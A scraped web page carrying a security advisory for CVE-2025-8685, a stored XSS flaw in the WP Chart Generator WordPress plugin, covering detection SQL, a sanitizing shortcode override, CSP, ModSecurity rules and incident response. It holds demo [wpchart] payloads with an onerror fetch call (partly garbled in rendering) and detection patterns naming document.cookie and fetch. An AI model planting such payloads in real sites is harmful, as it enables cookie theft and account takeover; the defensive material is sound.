| 插件名稱 | Wp 圖表生成器 |
|---|---|
| 漏洞類型 | 認證的儲存型 XSS |
| CVE 編號 | CVE-2025-8685 |
| 緊急程度 | 低 |
| CVE 發布日期 | 2025-08-11 |
| 來源 URL | CVE-2025-8685 |
漏洞通告:WP 圖表生成器 (≤ 1.0.4) — 經過身份驗證的貢獻者透過 [wpchart] 短代碼存儲 XSS (CVE‑2025‑8685)
執行摘要
本公告描述了“WP Chart Generator”WordPress插件(版本≤ 1.0.4)中的一個存儲型跨站腳本(XSS)漏洞,追蹤編號為CVE‑2025‑8685。.
在報告的披露中,嚴重性被認為是低至中等(CVSS 向量 ~6.5),因為利用需要經過身份驗證的貢獻者帳戶。發佈時沒有官方供應商修補程序。本通告提供技術細節、檢測方法、短期緩解選項、開發者修復指導、WAF/ModSecurity 規則示例,以及來自經驗豐富的香港安全從業者的事件響應檢查表。.
什麼是漏洞?
- 受影響的軟件:WP 圖表生成器插件
- 受影響的版本:≤ 1.0.4
- 漏洞類型:在 [wpchart] 短代碼渲染中的存儲跨站腳本(XSS)
- 所需權限:貢獻者(或更高)
- 發佈日期:2025年8月11日
- CVE:CVE‑2025‑8685
- 官方修復:發佈時無
該插件直接將不受信任的短代碼屬性和/或內部內容渲染到前端 HTML/JS 中,而未正確進行清理和轉義。貢獻者可以創建包含腳本片段或事件處理程序的精心設計的 [wpchart] 短代碼內容。渲染時,瀏覽器在網站的來源中執行注入的 JavaScript。.
為什麼這很重要(影響分析)
即使初始訪問需要低權限,存儲 XSS 仍然是高風險的。主要影響:
- 每次訪問者查看頁面時,持久有效載荷都會執行,擴大了暴露範圍。.
- 執行的 JavaScript 以頁面來源的權限運行:它可以嘗試竊取 cookies(如果不是 HttpOnly)、代表登錄用戶執行操作、顯示釣魚 UI 或重定向訪問者,並加載進一步的惡意資源(利用鏈、加載器、加密貨幣挖礦器)。.
- 許多網站允許貢獻者帳戶(例如,多作者博客、會員網站),因此攻擊者可以獲得或創建這樣的帳戶。.
- 編輯/管理員帳戶在登入狀態下查看前端內容會增加特權提升或帳戶接管的風險。.
漏洞的外觀 — 高層次技術步驟
該插件註冊了一個 [wpchart] 接受屬性(標籤、標題、數據數組、顏色)的短代碼。當這些屬性嵌入到HTML或內聯JavaScript中而未進行上下文感知的轉義時,就會產生漏洞。.
- 攻擊者獲得或創建一個貢獻者帳戶。.
- 他們添加一個包含精心製作的
[wpchart]短代碼,該短代碼具有屬性或內部內容,包含腳本片段或事件處理程序。. - 負載被存儲在數據庫中。當頁面被提供時,瀏覽器解析注入的標記或腳本並執行它。.
- 任何訪問者(包括已登入的編輯/管理員)都可以觸發該負載。.
示範負載(請勿在公共網站上部署):
[wpchart title=""]</code></pre>
<pre><code>[wpchart data='[{"label":"<img src="x" onerror="fetch(\"https:>","value":10}]']</code></pre>
<p>根本原因是在HTML/JS上下文中渲染不受信任的輸入而未進行轉義或驗證。.</p>
</section>
<section>
<h2 id="exploitation-scenarios-and-who-is-at-risk">利用場景及誰面臨風險</h2>
<ul>
<li>允許貢獻者創建內容的網站(會員或多作者網站)。.</li>
<li>具有社交註冊、大量導入的作者或弱帳戶控制的網站。.</li>
<li>編輯/管理員在身份驗證後預覽或查看前端內容的網站。.</li>
<li>公共訪客和客戶可能會受到影響(隱私和聲譽損害)。.</li>
<li>商業網站特別敏感,因為可能會篡改結帳流程。.</li>
</ul>
</section>
<section>
<h2 id="detection-how-to-find-vulnerable-or-exploited-instances">偵測 — 如何找到易受攻擊或已被利用的實例</h2>
<p>搜尋文章、頁面和元資料以 <code>[wpchart]</code> 實例和類似腳本的片段。.</p>
<h3 id="wp-cli">WP-CLI</h3>
<pre><code># 搜尋文章和頁面中的 'wpchart'
</code></pre>
<h3 id="sql">SQL</h3>
<pre><code>-- 在 post_content 中搜尋 wpchart 短碼;
</code></pre>
<p>尋找可疑的標記: <code><script</code>, <code>onerror=</code>, <code>onload=</code>, <code>javascript:</code>, <code>document.cookie</code>, <code>fetch(</code>, and encoded equivalents (e.g., <code><script></code>, <code>%3Cscript%3E</code>).</p>
<pre><code>SELECT ID, post_title, post_content
FROM wp_posts
WHERE post_content REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Also search postmeta and plugin options where chart configurations may be stored:</p>
<pre><code>SELECT post_id, meta_key, meta_value
FROM wp_postmeta
WHERE meta_value LIKE '%wpchart%'
OR meta_value REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Examine webserver logs for POSTs creating/updating content and for outbound requests to suspicious domains originating from page views.</p>
</section>
<section>
<h2 id="short-term-mitigations-site-owners-and-admins">Short-term mitigations (site owners and admins)</h2>
<p>If an immediate vendor patch is unavailable, take the following actions to reduce exposure:</p>
<ol>
<li><strong>Remove or deactivate the plugin (preferred):</strong> If chart functionality is not required immediately, deactivate and remove the plugin until fixed.</li>
<li><strong>Restrict Contributor accounts:</strong> Temporarily disable new registrations or change default role to Subscriber. Review contributors and suspend or reset passwords for suspicious accounts.</li>
<li><strong>Review content and remove malicious shortcodes:</strong> Search posts/pages and sanitize or remove any <code>[wpchart]</code> occurrences that include script-like patterns.</li>
<li><strong>Temporary server-side sanitizer (virtual patch):</strong> Override the shortcode with a safe handler to sanitize attributes and content. Example mu-plugin snippet:</li>
</ol>
<pre><code><?php
// mu-plugin/wpchart-sanitizer.php
if ( ! function_exists( 'wpchart_sanitized_handler' ) ) {
function wpchart_sanitized_handler( $atts = [], $content = '' ) {
// Basic attribute sanitization example
$atts = array_map( 'sanitize_text_field', (array) $atts );
// whitelist numeric attributes
if ( isset( $atts['width'] ) ) {
$atts['width'] = intval( $atts['width'] );
}
if ( isset( $atts['height'] ) ) {
$atts['height'] = intval( $atts['height'] );
}
// sanitize content using a safe allowlist
$content = wp_kses( $content, array(
'a' => array( 'href' => true, 'title' => true ),
'span' => array( 'class' => true ),
) );
// Build safe output (example: escaped)
$title = isset( $atts['title'] ) ? esc_html( $atts['title'] ) : '';
return '<div class="wpchart-safe" data-config="' . esc_attr( json_encode( $atts ) ) . '">' . $title . $content . '</div>';
}
// Remove original shortcode if registered and register safe handler
remove_shortcode( 'wpchart' );
add_shortcode( 'wpchart', 'wpchart_sanitized_handler' );
}
?>
</code></pre>
<p>Notes: place this as an mu-plugin so it loads early. This is a temporary mitigation to neutralize stored payloads before rendering.</p>
<ol start="5">
<li><strong>Harden browser-side controls:</strong> Implement a Content Security Policy (CSP) that blocks inline scripts and restricts script sources. Example header:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'</code></pre>
<p> Also ensure cookies use Secure and HttpOnly flags and consider SameSite settings.</li>
<li><strong>Deploy rule-based request filters:</strong> Use host-level or application-layer filters to block content submissions containing script-like payloads targeted at the <code>[wpchart]</code> shortcode (examples below).</li>
</ol>
</section>
<section>
<h2 id="waf-modsecurity-rules-examples">WAF / ModSecurity rules (examples)</h2>
<p>Below are example ModSecurity rules to block common XSS patterns related to <code>[wpchart]</code>. Test thoroughly before applying to production.</p>
<pre><code># ModSecurity example
SecRule REQUEST_URI|REQUEST_BODY "@rx \[wpchart[^\]]*(<script|onerror=|onload=|javascript:|document\.cookie|fetch\()" \
"id:1001001,phase:2,deny,log,status:403,msg:'Blocked stored XSS attempt in wpchart shortcode',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_METHOD "^POST$" \
"chain, id:1001002,phase:2,deny,log,status:403,msg:'Blocked POST containing script tag',severity:2"
SecRule REQUEST_BODY "@rx <\s*script\b" "t:none"
</code></pre>
<pre><code>SecRule REQUEST_BODY "@rx \[wpchart[^\]]*(onerror|onload|javascript:|document\.cookie|window\.location)" \
"id:1001003,phase:2,deny,log,status:403,msg:'Blocked suspicious attribute inside wpchart',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \
"phase:2,id:1001004,deny,log,status:403,msg:'Blocked potential XSS payload in post content',chain"
SecRule REQUEST_BODY "@rx (onerror|onload|<\s*script|javascript:|document\.cookie|fetch\()" "t:none"
</code></pre>
<p>Guidance:</p>
<ul>
<li>Target rules narrowly (match the <code>[wpchart]</code> token and plugin-specific meta keys) to reduce false positives.</li>
<li>Log and run in monitor/report-only mode initially to tune rules, then switch to deny once confidence is established.</li>
<li>Combine with rate-limiting to mitigate repeated attempts.</li>
</ul>
</section>
<section>
<h2 id="recommended-permanent-code-fixes-for-plugin-developers">Recommended permanent code fixes for plugin developers</h2>
<p>Developers should address the root causes with robust validation and context-aware escaping:</p>
<ol>
<li><strong>Sanitize input on accept:</strong> Use typed validation for numeric fields (intval(), floatval()), use <code>sanitize_text_field()</code> for simple strings, and parse & validate JSON configuration server-side.</li>
<li><strong>Escape output per context:</strong> Use <code>esc_attr()</code> for attribute values, <code>esc_html()</code> for text nodes and <code>wp_kses()</code> with strict allowlists for any permitted HTML. Avoid echoing unchecked input into inline scripts.</li>
<li><strong>Prefer data-* attributes:</strong> Emit sanitized JSON inside a data attribute via <code>wp_json_encode()</code> and let a vetted client-side script consume that data safely.</li>
<li><strong>Enforce capability checks and nonces:</strong> For any AJAX endpoints or admin UI that stores content, enforce <code>current_user_can()</code> and <code>check_admin_referer()</code>.</li>
<li><strong>Example safe shortcode output pattern:</strong></li>
</ol>
<pre><code>function wpchart_safe_shortcode( $atts = [], $content = '' ) {
$atts = shortcode_atts( array(
'title' => '',
'width' => 600,
'height' => 400,
'data' => '[]',
), $atts, 'wpchart' );
// Sanitize / validate
$safe = array(
'title' => sanitize_text_field( $atts['title'] ),
'width' => intval( $atts['width'] ),
'height' => intval( $atts['height'] ),
);
// For JSON data: decode and validate structure; re-encode safely
$data = json_decode( wp_unslash( $atts['data'] ), true );
if ( ! is_array( $data ) ) {
$data = array();
}
// Validate each data point (example)
$validated_data = array();
foreach ( $data as $row ) {
$label = isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '';
$value = isset( $row['value'] ) ? floatval( $row['value'] ) : 0;
$validated_data[] = array( 'label' => $label, 'value' => $value );
}
// Output: store config safely in data attribute and escape it for HTML
$cfg = wp_json_encode( array(
'title' => $safe['title'],
'width' => $safe['width'],
'height'=> $safe['height'],
'data' => $validated_data,
) );
return sprintf(
'<div class="wpchart" data-wpchart="%s"></div>',
esc_attr( $cfg )
);
}
</code></pre>
<p>Do not build inline scripts that interpolate user-provided values. Use external, audited JS that reads sanitized <code>data-*</code> attributes.</p>
</section>
<section>
<h2 id="incident-response-if-you-suspect-exploitation">Incident response: If you suspect exploitation</h2>
<ol>
<li>Take affected page(s) offline (unpublish) or put the site into maintenance mode if widespread.</li>
<li>Identify and remove malicious posts, shortcodes or plugin meta entries (see detection section).</li>
<li>Change passwords for Contributor+ accounts and administrators. Consider forcing password resets for all users if compromise is suspected.</li>
<li>Inspect server logs for suspicious activity and block attacker IPs at host or WAF level.</li>
<li>Run a full malware scan and file integrity check. Look for added admin users, unexpected scheduled tasks, or backdoors.</li>
<li>Rotate API keys, integration tokens, and any stored credentials that could be exposed.</li>
<li>If admin accounts were compromised, audit site settings and restore from a known-clean backup if necessary.</li>
<li>Notify affected users if user data may have been exposed, following applicable privacy and breach-notification law.</li>
<li>After cleanup, re-enable stricter registration policies, enforce two-factor authentication for elevated roles, apply CSP and secure HTTP headers.</li>
<li>Monitor for re-injection attempts and maintain long-term detection rules.</li>
</ol>
</section>
<section>
<h2 id="monitoring-and-detection-after-cleanup">Monitoring and detection after cleanup</h2>
<ul>
<li>Enable logging for request filters and review blocked events.</li>
<li>Set up content integrity checks to detect reappearance of suspicious <code>[wpchart]</code> shortcodes or injected script tags.</li>
<li>Schedule weekly scans and manual reviews for a period after the incident.</li>
<li>Deploy updates in a staging environment and validate fixes before production rollout.</li>
</ul>
</section>
<section>
<h2 id="hardening-recommendations-to-reduce-xss-risk-site-wide">Hardening recommendations to reduce XSS risk site-wide</h2>
<ul>
<li>Apply principle of least privilege: limit Contributor role usage and consider custom roles with reduced capabilities.</li>
<li>Require editorial review workflows: contributors should submit for review rather than publish directly.</li>
<li>Enforce strong passwords and two-factor authentication for editors and administrators.</li>
<li>Restrict untrusted user registration or require administrator approval.</li>
<li>Use CSP in report-only mode first to identify issues, then enforce once safe.</li>
<li>Ensure session cookies are HttpOnly and Secure; consider SameSite settings.</li>
<li>Keep WordPress core and plugins updated and perform periodic security audits.</li>
</ul>
</section>
<section>
<h2 id="a-short-note-for-developers-test-for-xss-during-qa">A short note for developers: test for XSS during QA</h2>
<ul>
<li>Include input fuzzing for shortcode attributes and stored values.</li>
<li>Automate tests to detect unescaped outputs in HTML and JS contexts.</li>
<li>Review third-party chart libraries and ensure data is passed safely (prefer data-* + JSON + validated client-side rendering).</li>
<li>Maintain a clear disclosure policy and a public changelog to accelerate coordinated fixes when issues are reported.</li>
</ul>
</section>
<section>
<h2 id="frequently-asked-questions-faq">Frequently asked questions (FAQ)</h2>
<h3 id="q-if-i-am-not-using-the-wp-chart-generator-plugin-am-i-affected">Q: If I am not using the WP Chart Generator plugin, am I affected?</h3>
<p>No. This advisory concerns specifically the WP Chart Generator plugin (≤ 1.0.4). However, the general guidance applies to any plugin that renders unescaped user input.</p>
<h3 id="q-if-an-attacker-needs-a-contributor-account-is-my-site-safe">Q: If an attacker needs a Contributor account, is my site safe?</h3>
<p>Not necessarily. Many sites allow registrations that map to low-privilege roles; weak or reused passwords are a common vector. Treat user registration as a potential risk and limit privileges where possible.</p>
<h3 id="q-will-a-content-security-policy-fully-prevent-exploitation">Q: Will a Content Security Policy fully prevent exploitation?</h3>
<p>A properly configured CSP substantially reduces the impact of many XSS payloads by blocking inline scripts and restricting script origins, but CSP should complement input sanitization and server-side protections — it is not a substitute for correct coding.</p>
<h3 id="q-is-the-issue-already-patched">Q: Is the issue already patched?</h3>
<p>At the time of this advisory, no official patched release was available. Follow the plugin's release channel for updates and apply the mitigations listed here until a patch is published.</p>
</section>
<section>
<h2 id="closing-thoughts">Closing thoughts</h2>
<p>Stored XSS like CVE‑2025‑8685 can have persistent and far-reaching consequences. Although exploitation requires authenticated access, many realistic paths exist to obtain contributor-level permissions. Treat unescaped shortcode attributes and plugin-rendered client-side scripts as high priority. Immediate actions: review and sanitize content, restrict Contributor capabilities, apply temporary sanitization or request-filtering, and consider deactivating the plugin until it is fixed. Plugin authors should implement strict input validation and context-aware escaping for all shortcode attributes and stored content.</p>
<p>If you lack in-house capability to perform scans or apply mitigations, engage a trusted security practitioner or managed service to assist with detection, virtual patching and recovery steps. Maintain careful logs of remediation actions and preserve forensic artifacts if a compromise is suspected.</p>
<p style="margin-top:12px;">Stay vigilant. Review user-generated content regularly and reduce the blast radius of low-privilege user accounts.</p>
</section>
<footer style="margin-top:28px;color:#666;font-size:0.95em;">
<p>Prepared by a Hong Kong security expert. CVE record: <a href="https://www.cve.org/CVERecord/SearchResults?query=CVE-2025-8685" target="_blank" rel="noopener noreferrer">CVE-2025-8685</a>.</p>
</footer>
<p></body><br />
</html></p>
</div>
<section class="post-tags"><ul><li><h5 class="title-tags">標籤:</h5></li><li><a href="https://wp-security.org/zh/tag/wordpress-security/" rel="tag">WordPress Security</a></li></ul></section> <div class="pk-share-buttons-wrap pk-share-buttons-layout-default pk-share-buttons-scheme-bold-bg pk-share-buttons-has-counts pk-share-buttons-has-total-counts pk-share-buttons-after-post pk-share-buttons-mode-php pk-share-buttons-mode-rest" data-post-id="803" data-share-url="https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" >
<div class="pk-share-buttons-total pk-share-buttons-total-no-count">
<div class="pk-share-buttons-count cs-font-primary">0 Shares:</div>
</div>
<div class="pk-share-buttons-items">
<div class="pk-share-buttons-item pk-share-buttons-facebook pk-share-buttons-no-count" data-id="facebook">
<a href="https://www.facebook.com/sharer.php?u=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-facebook"></i>
<span class="pk-share-buttons-label pk-font-primary">分享</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-twitter pk-share-buttons-no-count" data-id="twitter">
<a href="https://x.com/share?&text=%3Ctrp-post-container%20data-trp-post-id%3D%27803%27%3EHong%20Kong%20Security%20NGO%20warns%20WordPress%20XSS%28CVE20258685%29%3C%2Ftrp-post-container%3E&url=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-twitter"></i>
<span class="pk-share-buttons-label pk-font-primary">推文</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-pinterest pk-share-buttons-no-count" data-id="pinterest">
<a href="https://pinterest.com/pin/create/bookmarklet/?url=https://wp-security.org/zh/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/&media=https://wp-security.org/wp-content/uploads/2025/08/2025-08-11CVE20258685Wp-chart-generator-1024x576.jpg" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-pinterest"></i>
<span class="pk-share-buttons-label pk-font-primary">固定</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
</div>
</div>
<section class="post-author">
<div class="authors-compact">
<div class="author-wrap">
<div class="author">
<div class="author-avatar">
<a href="https://wp-security.org/zh/author/wp-security/" rel="author">
<img alt='' src='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=120&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=240&d=mm&r=g 2x' class='avatar avatar-120 photo' height='120' width='120' decoding='async'/> </a>
</div>
<div class="author-description">
<h5 class="title-author">
<span class="fn">
<a href="https://wp-security.org/zh/author/wp-security/" rel="author">
WP Security Vulnerability Report </a>
</span>
</h5>
<p class="note"></p>
</div>
</div>
</div>
</div>
</section>
<div id="disqus_thread"></div>
</div>
</div>
</article>
<div class="post-prev-next">
<a class="link-item prev-link" href="https://wp-security.org/zh/vulnerability-database/gmap-venturit-stored-xss-alert-for-hkcve20258568/">
<div class="link-content">
<div class="link-label">
<span class="link-arrow"></span><span class="link-text"> — 之前的文章</span>
</div>
<h2 class="entry-title">
GMap Venturit Stored XSS Alert for HK(CVE20258568) </h2>
</div>
</a>
<a class="link-item next-link" href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-wordpress-stock-quotes-xsscve20258688/">
<div class="link-content">
<div class="link-label">
<span class="link-text">下一篇文章 — </span><span class="link-arrow"></span>
</div>
<h2 class="entry-title">
Hong Kong Security WordPress Stock Quotes XSS(CVE20258688) </h2>
</div>
</a>
</div>
<section class="post-archive archive-related">
<div class="archive-wrap">
<div class="title-block-wrap">
<h5 class="title-block">
你可能也喜歡 </h5>
</div>
<div class="archive-main archive-list archive-heading-small archive-borders-enabled archive-shadow-enabled archive-scale-enabled">
<article class="entry-without-preview post-1117 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-advisory-greenshift-access-flawcve202557884/" rel="bookmark">Hong Kong Security Advisory Greenshift Access Flaw(CVE202557884)</a></h2><ul class="post-meta"><li class="meta-date">8 月 22, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Greenshift Plugin <= 12.1.1 - Broken Access Control Vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-2030 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/protecting-users-from-easy-digital-downloads-redirectscve202514783/" rel="bookmark">Protecting Users From Easy Digital Downloads Redirects(CVE202514783)</a></h2><ul class="post-meta"><li class="meta-date">12 月 30, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Open Redirection in WordPress Easy Digital Downloads Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1772 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-advisory-on-orderconvo-access-flawcve202513389/" rel="bookmark">Hong Kong Advisory on OrderConvo Access Flaw(CVE202513389)</a></h2><ul class="post-meta"><li class="meta-date">11 月 25, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Broken Access Control in WordPress OrderConvo Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-2520 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-advisory-xss-in-simplebookletcve202413588/" rel="bookmark">Hong Kong Security Advisory XSS in Simplebooklet(CVE202413588)</a></h2><ul class="post-meta"><li class="meta-date">2 月 3, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Cross Site Scripting (XSS) in WordPress Simplebooklet PDF Viewer and Embedder Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-2966 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-alert-ravelry-widget-xsscve20261903-2/" rel="bookmark">Hong Kong Security Alert Ravelry Widget XSS(CVE20261903)</a></h2><ul class="post-meta"><li class="meta-date">2 月 16, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Cross Site Scripting (XSS) in WordPress Ravelry Designs Widget Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-3356 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/zh/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/zh/vulnerability-database/hong-kong-security-alert-local-file-inclusioncve202627326/" rel="bookmark">Hong Kong Security Alert Local File Inclusion(CVE202627326)</a></h2><ul class="post-meta"><li class="meta-date">3 月 6, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Local File Inclusion in WordPress AC Services | HVAC, Air Conditioning & Heating Company WordPress Theme Theme </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
</div>
</div>
</section>
</main>
</div><!-- .content-area -->
</div><!-- .main-content -->
</div><!-- .cs-container -->
</div><!-- .site-content -->
<footer id="colophon" class="site-footer">
<div class="footer-subscribe">
<div class="cs-container">
<div class="subscribe-wrap">
</div>
</div>
</div>
<div class="footer-info">
<div class="cs-container">
<div class="site-info">
<div class="footer-col-info">
<span class="site-title footer-title" href="https://wp-security.org/zh/" rel="home">
<img src="https://wp-security.org/wp-content/uploads/2025/08/WP-Security-logo-1-e1754494371106.png" alt="WP Security" > </span>
<div class="footer-copyright">
© 2025 WP-Security.org Disclaimer: WP-Security.org is an independent, non-profit NGO community committed to sharing WordPress security news and information. We are not affiliated with WordPress, its parent company, or any related entities. All trademarks are the property of their respective owners. </div>
</div>
</div>
</div>
</div>
</footer>
</div>
</div><!-- .site-inner -->
</div><!-- .site -->
<template id="tp-language" data-tp-language="zh_HK"></template><script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/zh/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/squaretype/*","/zh/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<a href="#top" class="pk-scroll-to-top">
<i class="pk-icon pk-icon-up"></i>
</a>
<div class="pk-mobile-share-overlay">
</div>
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(['setCustomDimension', 1, '{"ID":3,"name":"WP Security Vulnerability Report","avatar":"f7de7e299d4a4b4c92c6f2c2a29a7ca7"}']);
_paq.push(['trackPageView']);
(function () {
var u = "https://analytics2.wpmudev.com/";
_paq.push(['setTrackerUrl', u + 'track/']);
_paq.push(['setSiteId', '24942']);
var d = document, g = d.createElement('script'), s = d.getElementsByTagName('script')[0];
g.type = 'text/javascript';
g.async = true;
g.defer = true;
g.src = 'https://analytics.wpmucdn.com/matomo.js';
s.parentNode.insertBefore(g, s);
})();
</script>
<script id='kirki-viewport-lists'>var kirkiViewports = {"md":{"value":1200,"scale":1,"minWidth":1200,"maxWidth":1200,"title":"Desktop","icon":"desktop","activeIcon":"desktop-hover","id":"md","type":"max"},"tablet":{"value":991,"scale":1,"minWidth":991,"maxWidth":991,"title":"Tablet","icon":"tablet-default","activeIcon":"tablet-hover","type":"max","id":"tablet"},"mobileLandscape":{"value":767,"scale":1,"minWidth":767,"maxWidth":767,"title":"Landscape","icon":"phone-hr-default","activeIcon":"phone-hr-hover","type":"max","id":"mobileLandscape"},"mobile":{"value":575,"scale":1,"minWidth":575,"maxWidth":575,"title":"Mobile","icon":"phone-vr-default","activeIcon":"phone-vr-hover","type":"max","id":"mobile"}};</script><script id='kirki-variable-lists'>var kirkiCSSVariable = {"data":[{"title":"Colors","key":"color","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Numbers","key":"size","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Text Styles","key":"text-style","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Font Family","key":"font-family","modes":[{"title":"Default","key":"default"}],"variables":[]}]};</script><script id="kirki-api-and-nonce">
window.wp_kirki = {
ajaxUrl: "https://wp-security.org/wp-admin/admin-ajax.php",
restUrl: "https://wp-security.org/zh/wp-json/",
siteUrl: "https://wp-security.org",
apiVersion: "v1",
postId: "803",
nonce: "f86a83cca8",
call_from: "",
templateId: "",
context: {"id":803,"type":"post"}
};
</script><script id="wp-importmap" type="importmap">
{"imports":{"@wordpress/interactivity":"https://wp-security.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=efaa5193bbad9c60ffd1","@surecart/checkout":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67","@surecart/checkout-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-events/index.js?ver=ed9647bd6c7865efe2ad","@surecart/checkout-service":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout-actions/index.js?ver=e445a0ee0396d75d52c0","@surecart/google-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/google/index.js?ver=d92e383a18bcf54ea538","@surecart/facebook-events":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/facebook/index.js?ver=cf5c6499cb7b867894c1","@wordpress/a11y":"https://wp-security.org/wp-includes/js/dist/script-modules/a11y/index.min.js?ver=1c371cb517a97cdbcb9f","@surecart/api-fetch":"https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/fetch/index.js?ver=1bfba8ea0694a193022a"}}
</script>
<script id="@surecart/line-item-note-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/line-item-note/index.js?ver=af6cf14267b5a9ad219f" type="module"></script>
<script id="@surecart/checkout-js-module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=3bbe28b8db1e11147c67" type="module"></script>
